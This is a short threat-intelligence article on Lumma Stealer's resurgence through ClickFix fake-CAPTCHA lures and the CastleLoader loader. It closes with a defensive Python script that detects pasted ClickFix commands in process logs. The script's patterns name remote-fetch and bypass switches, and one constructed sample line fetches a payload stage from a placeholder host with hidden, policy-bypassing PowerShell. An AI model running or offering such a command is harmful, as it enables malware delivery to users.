Lumma Stealer's Stealthy Return: Back at Scale
12 Feb
Summary
- Lumma infostealer has resurfaced with sophisticated, hard-to-detect attacks.
- Malware uses fake CAPTCHAs to trick users into installing malicious code.
- Law enforcement previously disrupted Lumma, but it has rapidly rebuilt infrastructure.

Lumma Stealer, a potent infostealer, has made a significant comeback despite a major law enforcement operation last year that disrupted its infrastructure. The malware, which first appeared in 2022, is now operating at scale again, infecting a substantial number of Windows computers globally.
The current surge in Lumma infections relies heavily on "ClickFix," a social engineering lure. This method deceives users into running malicious commands by presenting them as fake CAPTCHAs. Victims are instructed to copy text and paste it into their Windows terminal, inadvertently installing loader malware that then deploys Lumma.
A key element of Lumma's resurgence is the use of CastleLoader, a stealthy, in-memory malware that is heavily obfuscated and difficult to detect. This loader shares rebuilt infrastructure with Lumma, indicating coordinated efforts by threat actors. Lumma also exploits trusted platforms like Discord and Steam Workshop for distribution, further lowering user suspicion.
Once installed, Lumma siphons a wide array of sensitive data, including browser credentials, personal documents, financial information, cryptocurrency wallet data, and system metadata. The effectiveness of the "ClickFix" method stems from its exploitation of user trust and familiarity with verification processes, leading victims to manually execute malicious code.
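The ClickFix chain described above, in which the victim pastes text into the Run dialog or a terminal, leaves a recognisable process-creation footprint: a shell interpreter started under Explorer with a command line that fetches or hides something. The following Python is an added example, not code from the article or from any vendor it mentions; it scans constructed Sysmon-style process-creation records for that pattern, and the record format, interpreter list, trait regexes and sample events are all assumptions.

```python
import re

# Interpreters a pasted ClickFix command usually lands in (assumed list, not from the article)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Parent processes that indicate a user-typed launch (the Win+R Run dialog is hosted by Explorer)
USER_LAUNCH_PARENTS = {"explorer.exe"}
# Command-line traits that rarely appear in a command a user would type by hand
TRAITS = {
    "remote fetch": r"https?://|\b(iwr|invoke-webrequest|curl|wget)\b",
    "encoded payload": r"-e(nc|ncodedcommand)?\s",
    "policy/visibility evasion": r"-ep\s+bypass|-w(indowstyle)?\s+hidden",
}

def parse_event(line: str) -> dict:
    """Parse one constructed 'Key=Value|Key=Value' process-creation record."""
    return dict(field.split("=", 1) for field in line.split("|"))

def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]

def clickfix_reasons(event: dict) -> list[str]:
    """Return the traits that make an event look like a ClickFix paste, or [] if none."""
    if basename(event.get("Image", "")) not in SHELLS:
        return []
    if basename(event.get("ParentImage", "")) not in USER_LAUNCH_PARENTS:
        return []  # service or scheduled-task launches are a different detection, not this lure
    cmd = event.get("CommandLine", "")
    return [name for name, pat in TRAITS.items() if re.search(pat, cmd, re.IGNORECASE)]

def find_clickfix_candidates(lines) -> list[tuple[str, list[str]]]:
    """Return (User, reasons) for each record that trips at least one trait."""
    hits = []
    for line in lines:
        ev = parse_event(line.strip())
        reasons = clickfix_reasons(ev)
        if reasons:
            hits.append((ev.get("User", "?"), reasons))
    return hits

# Constructed sample records (not real telemetry); the hostname is a placeholder
SAMPLE_EVENTS = [
    "User=CORP\\alice|ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\cmd.exe|CommandLine=cmd /c ipconfig /all",
    "User=CORP\\bob|ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|CommandLine=powershell -w hidden -ep bypass iwr http://placeholder.invalid/stage",
    "User=NT AUTHORITY\\SYSTEM|ParentImage=C:\\Windows\\System32\\svchost.exe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|CommandLine=powershell -File C:\\scripts\\backup.ps1",
]

if __name__ == "__main__":
    for user, reasons in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"{user}: {', '.join(reasons)}")
```

Only the second record is reported, because the first has an Explorer parent but a harmless command line and the third has suspicious-looking switches but was not launched by a user. In production the same logic maps onto Sysmon Event ID 1 or Windows Security event 4688 fields.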